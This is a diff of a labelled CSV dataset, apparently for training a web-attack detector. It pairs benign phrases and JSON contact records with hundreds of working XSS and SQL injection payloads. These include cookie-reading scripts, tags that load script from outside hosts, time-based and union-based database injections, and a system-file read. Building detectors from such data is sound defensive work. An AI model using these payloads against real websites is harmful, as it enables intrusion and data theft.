onclick=alert()//>*/alert()/*,1,XSS,9579 -1'+ ( select ukwc where 3008 = 3008 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,16310 -"1"" ) ) as ycvh where 4523 = 4523 and sleep ( 5 ) #",2,SQLi,19256 -"<img """"""><script>alert(""XSS by \nxss"")</script><marquee><h1>XSS by xss</h1></marquee>",1,XSS,1291 -"<iframe><img title=""</iframe><img src onerror=alert(1)>""></iframe>",1,XSS,114 -"-6333"" ) ) ) union all select 9851,9851,9851,9851,9851,9851--",2,SQLi,12522 -"{""id"":null,""firstName"":""Cassia"",""lastName"":""Seah"",""address"":""50 MCDOWELL STREET, WELCH WV 24801"",""city"":""729"",""telephone"":""5071907857""}",0,normal,25389 -"1"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""wvyb"" = ""wvyb",2,SQLi,19013 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><embed id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></embed>",1,XSS,7629 -"<picture draggable=""true"" ondragleave=""alert(1)"">test</picture>",1,XSS,3297 -"<sub draggable=""true"" ondragstart=""alert(1)"">test</sub>",1,XSS,2767 -"1"" where 7796 = 7796",2,SQLi,15146 -"<style>:target {transform: rotate(180deg);}</style><embed id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></embed>",1,XSS,3487 -"1%' ) ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,18309 -1' ) as pudv where 2609 = 2609,2,SQLi,14975 -"1'|| ( select 'tmsj' where 2971 = 2971 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,17091 -"1"" ) as zbhs where 2017 = 2017 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --",2,SQLi,17409 -ORDER BY 29,2,SQLi,10368 -"<big onmouseover=""alert(1)"">test</big>",1,XSS,6235 -"1"" ) as ronb where 9368 = 9368",2,SQLi,18302 -OR 3409=3409 AND ('pytW' LIKE 'pytY,2,SQLi,10244 -"<style>@keyframes x{}</style><param style=""animation-name:x"" onanimationstart=""alert(1)""></param>",1,XSS,5326 -<colgroup id=x tabindex=1 onbeforeactivate=alert(1)></colgroup>,1,XSS,8408 --6518' ) ) as vocx where 2539 = 2539 or ( 8652 = 2025 ) *2025--,2,SQLi,15239 -") AND =BENCHMARK(5000000,MD5(0x774c5341))--",2,SQLi,11358 -"ABC<div style=""x:\xE2\x80\x82expression(javascript:alert(1)"">DEF",1,XSS,463 -<svg><html onload=alert(1)></html>,1,XSS,3779 -") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,11329 -select ( case when ( 1961 = 2048 ) then 1961 else 1961* ( select 1961 from information_schema.character_sets ) end ) #,2,SQLi,20844 -<br><br><br><br><br><br><br><br><br><br>,1,XSS,9073 -"1"" ) as rnte where 6517 = 6517 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12567 -%' WAITFOR DELAY '0:0:5'--,2,SQLi,11396 -<thead id=x tabindex=1 ondeactivate=alert(1)></thead><input id=y autofocus>,1,XSS,8067 -–,2,SQLi,10013 -"1' ) where 9544 = 9544 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,14450 -1 ) ) as foul where 4361 = 4361 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,17077 -Where did you find that amazing view from?,0,normal,23869 -<svg onload=(alert)(1)>,1,XSS,9297 -"{""id"":null,""firstName"":""Desmond"",""lastName"":""Tan"",""address"":""8284 Hart St"",""city"":""7"",""telephone"":""6150791007""}",0,normal,25516 -<ol id=x tabindex=1 onfocus=alert(1)></ol>,1,XSS,5847 -"<u onbeforecopy=""alert(1)"" contenteditable>test</u>",1,XSS,7752 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12",2,SQLi,10547 -"><svg onload=alert(1)// -`<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a()%20x>`",1,XSS,9619 -"1 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,19384 -Select deal.,0,normal,24949 -select case when 6662 = 9889 then 1 else null end--,2,SQLi,18330 -Merge the company logos.,0,normal,22818 -"1"" ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,22397 -1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11291 -Please select an option.,0,normal,24492 -"<style onLoad style onLoad=""javascript:javascript:alert(1)""></style onLoad>",1,XSS,367 -"1' ) ) as eleh where 1347 = 1347 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,22069 -<ol onpointerdown=alert(1)>XSS</ol>,1,XSS,6825 -"&lt;SCRIPT a=\""&gt;\"" SRC=\""http&#58;//ha&#46;ckers&#46;org/xss&#46;js\""&gt;&lt;/SCRIPT&gt;",1,XSS,997 -"<summary oncopy=""alert(1)"" contenteditable>test</summary>",1,XSS,7842 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 8503 = 8503",2,SQLi,14374 -"<style>:target {transform: rotate(180deg);}</style><marquee id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></marquee>",1,XSS,4835 -1' rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and 'xnap' = 'xnap,2,SQLi,13970 -"<aside onkeyup=""alert(1)"" contenteditable>test</aside>",1,XSS,8844 -Select a cozy nook.,0,normal,22943 --8010' or ( 2225 = 8491 ) *8491 and 'eipf' = 'eipf,2,SQLi,21244 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26",2,SQLi,10649 -Select a destination for the trip.,0,normal,24191 -"1' ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'cogf' like 'cogf",2,SQLi,17626 -"select * from users where id = 1 or "".["" or 1 = 1 -- 1",2,SQLi,11781 -"1' ) ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ( 'weof' = 'weof",2,SQLi,21195 -1'+ ( select dklj where 3265 = 3265,2,SQLi,18743 -"<iframe onkeyup=""alert(1)"" contenteditable>test</iframe>",1,XSS,5352 -"{""id"":null,""firstName"":""Ng"",""lastName"":""George"",""address"":""115 ENTERPRISE COURT, GREENWOOD SC 29649"",""city"":""443"",""telephone"":""3349897941""}",0,normal,25462 -union ( select @@version ) --,2,SQLi,11918 -1 where 4949 = 4949,2,SQLi,16719 -"1; ( load_file ( char ( 47,101,116,99,47,112,97,115, ...",2,SQLi,11483 -"<isindex onclick=""alert(1)"">test</isindex>",1,XSS,8466 -"1'+ ( select llcl where 8188 = 8188 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,13886 -"{""id"":null,""name"":""Darumaka""}",0,normal,25797 -1' rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and 'hyun' like 'hyun,2,SQLi,18371 -Select navigate.,0,normal,24836 -"{""id"":null,""name"":""Birds Of Paradise""}",0,normal,26095 -"{""id"":null,""firstName"":""Ann"",""lastName"":""Lee"",""address"":""393 Lafayette Ave"",""city"":""891"",""telephone"":""6400371896""}",0,normal,25770 -";a=prompt,a()// -><img src=x onerror=prompt(1);>",1,XSS,9620 -; begin declare @var varchar(8000) set @var=' ...,2,SQLi,10159 -"<style>:target {transform: rotate(180deg);}</style><dd id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></dd>",1,XSS,3695 -")) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11078 -"1' in boolean mode ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) #",2,SQLi,21878 -AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i,2,SQLi,11124 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#",2,SQLi,10839 -"1%"" or sleep ( 5 ) #",2,SQLi,20304 -&#0060,1,XSS,1021 -"<noframes onbeforecopy=""alert(1)"" contenteditable>test</noframes>",1,XSS,4846 -"-8238' ) ) union all select 9797,9797,9797,9797,9797,9797,9797,9797#",2,SQLi,14137 -"1"" where 2483 = 2483",2,SQLi,16311 -"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">",1,XSS,269 -<svg><header onload=alert(1)></header>,1,XSS,6621 -"{""id"":null,""firstName"":""Nanny"",""lastName"":""Julie"",""address"":""31 Douglas Blvd #950"",""city"":""848"",""telephone"":""606880468""}",0,normal,26024 -<dfn onpointerdown=alert(1)>XSS</dfn>,1,XSS,2562 -"<isindex draggable=""true"" ondragleave=""alert(1)"">test</isindex>",1,XSS,2102 -"1' ) as hats where 2011 = 2011 union all select null,null,null,null,null#",2,SQLi,14302 -"<hgroup onkeypress=""alert(1)"" contenteditable>test</hgroup>",1,XSS,5043 -"ORDER BY 1,SLEEP(5),3#",2,SQLi,10479 -"<blockquote ondblclick=""alert(1)"">test</blockquote>",1,XSS,8797 -"-5054%"" ) ) ) union all select 8263,8263,8263,8263--",2,SQLi,21736 -Select pillow.,0,normal,23235 -"javascript:/*`//'//\""//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame <svg""///*/ onload=alert()//</script>",1,XSS,9526 -"select * from users where id = 1 union select 1a,banner from v$version where rownum = 1 -- 1",2,SQLi,12017 -"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( 'ootz' like 'ootz",2,SQLi,19149 -"-3071 ) ) as uiiu where 8910 = 8910 union all select 8910,8910,8910,8910,8910,8910,8910#",2,SQLi,12960 -"<param ondblclick=""alert(1)"">test</param>",1,XSS,5422 -"<IMG SRC=x onseeking=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1188 -<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>,1,XSS,9001 -"<ul onpaste=""alert(1)"" contenteditable>test</ul>",1,XSS,6771 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,22190 --8234' ) ) ) or 9323 = 9323#,2,SQLi,14052 -"1' ) ) and make_set ( 8403 = 8403,8899 ) and ( ( 'lokx' like 'lokx",2,SQLi,20293 -"<svg onmousemove=""alert(1)"">test</svg>",1,XSS,6782 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><html id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></html>",1,XSS,5743 -"<dfn onbeforecut=""alert(1)"" contenteditable>test</dfn>",1,XSS,7232 -"<sub onpaste=""alert(1)"" contenteditable>test</sub>",1,XSS,8762 -exec xp,2,SQLi,12117 -"<acronym onpaste=""alert(1)"" contenteditable>test</acronym>",1,XSS,1890 -1' ) ) as tcby where 5213 = 5213,2,SQLi,19477 -<map onpointermove=alert(1)>XSS</map>,1,XSS,2130 -ORDER BY 23#,2,SQLi,10331 -"<input onbeforecut=alert(1) value=""XSS"" autofocus>",1,XSS,3201 -<;HTML>;<;BODY>;,1,XSS,1570 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#",2,SQLi,10857 -"1'+ ( select rqcw where 9002 = 9002 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14461 -Fetch records where necessary.,0,normal,23472 -"<style>:target {transform: rotate(180deg);}</style><del id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></del>",1,XSS,6729 -"<div draggable=""true"" contenteditable>drag me</div><legend ondrop=alert(1) contenteditable>drop here</legend>",1,XSS,6215 -declare @q nvarchar ( 200 ) select @q = 0x770061 ...,2,SQLi,11550 -"ABC<div style=""x:\xE3\x80\x80expression(javascript:alert(1)"">DEF",1,XSS,448 -"-3667%' ) ) union all select 3560,3560,3560--",2,SQLi,18896 -"1%"" ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ""%"" = """,2,SQLi,17149 -", exec ( 'sel' + 'ect us' + 'er' )",2,SQLi,11803 -"<div id=""62""><!-- IE 6-8 -->",1,XSS,9125 -"-1332 ) as qtbb where 7261 = 7261 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,21079 -Where's the missing remote?,0,normal,22769 -"-2001'+ ( select 'nput' where 8368 = 8368 union all select 8368,8368,8368,8368,8368,8368,8368,8368,8368#",2,SQLi,19029 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></a>",1,XSS,1766 -1' ) ) as ypgz where 8704 = 8704,2,SQLi,12991 -"-9954"" ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ""bifi"" = ""bifi",2,SQLi,21413 -"1"" ) as rgod where 5766 = 5766 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13208 -</body>,1,XSS,1304 -"document.getElementsByClassName("""").length",1,XSS,2445 -"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://hacker.com/xss.html"">",1,XSS,1311 -"1' union all select null,null,null,null,null,null,null#",2,SQLi,18998 -<address onpointermove=alert(1)>XSS</address>,1,XSS,2333 -1' and ( select * from ( select ( sleep ( 5 ) ) ) fzno ),2,SQLi,19773 -"1"" and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ""qzzg"" like ""qzzg",2,SQLi,16788 -"1%"" and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""%"" = """,2,SQLi,21903 -Please select one option.,0,normal,24477 -"[text](http://danlec.com "" [@danlec](/danlec) "")",1,XSS,9449 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'ekhi' = 'ekhi",2,SQLi,14663 -"<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>",1,XSS,9253 -"<header onmouseleave=""alert(1)"">test</header>",1,XSS,2967 -"<IMG SRC=x onwaiting=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1193 -"1%' ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( '%' = '",2,SQLi,17788 --8163 ) ) as cvai where 2360 = 2360 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,18052 -Where's the villa?,0,normal,23750 -"<ul onbeforecopy=""alert(1)"" contenteditable>test</ul>",1,XSS,7650 -"<header onbeforepaste=""alert(1)"" contenteditable>test</header>",1,XSS,4324 -Delete the post.,0,normal,23072 -"1%"" ) ) and ( 3020 = 3020 ) *6703 and ( ( ""%"" = """,2,SQLi,18786 +"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ""swec"" like ""swec",2,SQLi,14193 +<xmp onfocusout=alert(1) tabindex=1 id=x></xmp><input autofocus>,1,XSS,8389 +Select mark.,0,normal,24629 +1' ) ) as hzbj where 1725 = 1725 or sleep ( 5 ) #,2,SQLi,16031 +"-4236' ) union all select 2076,2076,2076,2076,2076,2076,2076,2076,2076,2076#",2,SQLi,22183 +AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i,2,SQLi,10979 +"UNION ALL SELECT 1,2,3--",2,SQLi,10456 +select case when 8975 = 2352 then 1 else null end--,2,SQLi,14237 +"1%"" ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ""%"" = """,2,SQLi,18630 +1'+ ( select wgmn where 4368 = 4368 and 7859 = 6151 ) +',2,SQLi,12452 +"-5802' ) ) ) union all select 6286,6286,6286,6286#",2,SQLi,16149 +"<script src=""\\%(jscript)s""></script>",1,XSS,648 +You can move the joystick to the left to select the map display.,0,normal,25057 +"1%"" ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ( ""%"" = """,2,SQLi,17269 +"<form onmouseenter=""alert(1)"">test</form>",1,XSS,2820 +<audio onpointerleave=alert(1)>XSS</audio>,1,XSS,3685 +"-4876"" ) ) as saug where 2256 = 2256 union all select 2256,2256,2256,2256,2256,2256,2256,2256,2256,2256--",2,SQLi,20076 +<bdo onpointerleave=alert(1)>XSS</bdo>,1,XSS,6888 +"1 ) ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 9184 = 9184",2,SQLi,13344 +"<xmp onbeforecopy=""alert(1)"" contenteditable>test</xmp>",1,XSS,3342 +"<style>:target {color:red;}</style><main id=x style=""transition:color 1s"" ontransitionend=alert(1)></main>",1,XSS,8331 +"<font onmouseout=""alert(1)"">test</font>",1,XSS,8743 +-5830' ) as fivy where 2173 = 2173 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,15912 +"<IMG SRC=""jav&#x0A;ascript:alert('');"">",1,XSS,4282 +<dfn onpointermove=alert(1)>XSS</dfn>,1,XSS,2211 +"<rp onmouseleave=""alert(1)"">test</rp>",1,XSS,5519 +"<textarea><img title=""</textarea><img src onerror=alert(1)>""></textarea>",1,XSS,116 +"<style>@keyframes x{}</style><fieldset style=""animation-name:x"" onanimationend=""alert(1)""></fieldset>",1,XSS,7827 +"-5624' union all select 3723,3723,3723,3723,3723--",2,SQLi,21105 +"1 ) ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,15481 +<ol onpointermove=alert(1)>XSS</ol>,1,XSS,3422 +<select id=x tabindex=1 ondeactivate=alert(1)></select><input id=y autofocus>,1,XSS,2547 +"<base onmouseenter=""alert(1)"">test</base>",1,XSS,8782 +"select * from users where id = 1 or @<@ = 1 union select 1,version ( ) -- 1",2,SQLi,11552 +Select tutor.,0,normal,24684 +"<center draggable=""true"" ondragleave=""alert(1)"">test</center>",1,XSS,6836 +"-1333"" ) ) union all select 2376,2376,2376,2376,2376,2376,2376,2376,2376--",2,SQLi,20713 +Careful selection.,0,normal,24751 +"<SCRIPT a="">"" SRC=""httx://xss.rocks/xss.js""></SCRIPT>",1,XSS,290 +"1"" and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,19067 +<video onpointermove=alert(1)>XSS</video>,1,XSS,1789 +"select * from users where id = 1 or 1#""{ union select 'a',version ( ) -- 1",2,SQLi,12011 +"benchmark(50000000,MD5(1))#",2,SQLi,10276 +"1' where 2391 = 2391 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,18015 +"1 ) where 1270 = 1270 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,18263 +"1"" ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( ""gfwz"" = ""gfwz",2,SQLi,22246 +Select a hairstyle for a change.,0,normal,24153 +&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;,1,XSS,1338 +"( extractvalue ( 1759,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1759 = 1759,1 ) ) ) ,0x717a767a71 ) ) )",2,SQLi,20812 +"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( ""gydr"" like ""gydr",2,SQLi,12705 +Select a painting technique to try.,0,normal,24021 +"1"" ) ) as swwb where 4244 = 4244",2,SQLi,21308 +Save up to 30% off select Outdoor Décor and Essentials,0,normal,25677 +"<map onmouseenter=""alert(1)"">test</map>",1,XSS,3120 +Pottery Barn: Up to 70% off select sale items; up to 50% off select chandeliers; up to 30% home office; up to 503% off coffee tables.,0,normal,25726 +ORDER BY 31337,2,SQLi,10229 +"<! foo=""><script>javascript:alert(1)</script>"">",1,XSS,602 +"1 ) ) as oqfr where 6426 = 6426 and make_set ( 8403 = 8403,8899 ) --",2,SQLi,14379 +"( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ""%"" = """,2,SQLi,18866 +"UNION SELECT @@VERSION,SLEEP(5),USER(),4#",2,SQLi,10514 +<label id=x tabindex=1 onfocusin=alert(1)></label>,1,XSS,6355 +"<audio onkeyup=""alert(1)"" contenteditable>test</audio>",1,XSS,8828 +"-6126 union all select 8486,8486,8486,8486,8486,8486,8486,8486,8486--",2,SQLi,20383 +document.scripts.length,1,XSS,4951 +Users can also manually select people they want to see highlighted.,0,normal,25161 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--",2,SQLi,10674 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23 ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/* ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20-- ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23 +'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/* +'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20-- +'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23 ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*",2,SQLi,22495 +-8032%' ) ) ) or 9323 = 9323#,2,SQLi,18838 +-8515' or 1329 = 9536,2,SQLi,21389 +1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'svhx' = 'svhx,2,SQLi,18758 +case,0,normal,23113 +1 ) ) ) union all select null#,2,SQLi,19927 +"1 ) ) as xovu where 4530 = 4530 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,18295 +<select onpointerdown=alert(1)>XSS</select>,1,XSS,4075 +"<th onclick=""alert(1)"">test</th>",1,XSS,5107 +=+ADw-script+AD4-alert(+ACc-xss+ACc-)+ADw-+AC8-script+AD4-,1,XSS,9713 +"<b draggable=""true"" ondragenter=""alert(1)"">test</b>",1,XSS,6294 +1' ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( 'fuvv' = 'fuvv,2,SQLi,13746 +1' ) ) and 4650 = 1322#,2,SQLi,18282 +"<rtc onkeypress=""alert(1)"" contenteditable>test</rtc>",1,XSS,5836 +Let's find out where the local festival is.,0,normal,23910 +�><s�%2b�cript>alert(document.cookie)</script>,1,XSS,1662 +<area id=x tabindex=1 onbeforedeactivate=alert(1)></area><input autofocus>,1,XSS,2681 +[a](javascript&#58this;alert(1&#41;),1,XSS,9374 +"<div draggable=""true"" ondragend=""alert(1)"">test</div>",1,XSS,6522 +"1"" ) and 6565 = 2647 and ( ""mrge"" like ""mrge",2,SQLi,14476 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i",2,SQLi,11007 +"UNION ALL SELECT 1,2,3,4,5,6,7,8#",2,SQLi,10431 +"<sup ondblclick=""alert(1)"">test</sup>",1,XSS,8617 +1' ) as zdhq where 5586 = 5586,2,SQLi,19485 +1 ) ) and 4595 = 4595#,2,SQLi,18879 +Identify columns where applicable.,0,normal,23257 +1 ) ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ( 4574 = 4574,2,SQLi,20044 +"<style>:target {color: red;}</style><tfoot id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></tfoot>",1,XSS,6134 +<progress onpointerleave=alert(1)>XSS</progress>,1,XSS,3107 +"1%"" ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( ""%"" = """,2,SQLi,16633 +The film will be screening for free in select theaters.,0,normal,25413 +"<blockquote onkeydown=""alert(1)"" contenteditable>test</blockquote>",1,XSS,5149 +"<small onmousedown=""alert(1)"">test</small>",1,XSS,5997 +<pre onfocusout=alert(1) tabindex=1 id=x></pre><input autofocus>,1,XSS,6077 +"<fieldset draggable=""true"" ondrag=""alert(1)"">test</fieldset>",1,XSS,4120 +HAVING 1=0--,2,SQLi,10109 +<acronym id=x tabindex=1 onfocusin=alert(1)></acronym>,1,XSS,3105 +Retrieve info where necessary.,0,normal,23419 +"<img draggable=""true"" ondragstart=""alert(1)"">test</img>",1,XSS,8604 +"-6731"" where 6166 = 6166 union all select 6166,6166,6166,6166,6166,6166--",2,SQLi,20138 +"1%' ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( '%' = '",2,SQLi,15136 +"1%"" ) ) ) order by 1--",2,SQLi,16400 +"<a href=""javascript:x='&percnt;27-alert(1)-%27';"">XSS</a>",1,XSS,195 +"After you've filled in the details, select ""Place Order"" to buy.",0,normal,26352 +"<area onmouseleave=""alert(1)"">test</area>",1,XSS,3609 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( ( 'ksoc' = 'ksoc,2,SQLi,17169 +<h1 onfocusout=alert(1) tabindex=1 id=x></h1><input autofocus>,1,XSS,4526 +"<IMG SRC=x ondrop=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1167 +"<style>@keyframes slidein {}</style><ol style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" 